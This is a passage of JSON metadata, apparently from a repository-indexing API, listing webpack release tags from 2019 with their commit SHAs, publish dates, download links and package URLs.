eload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/w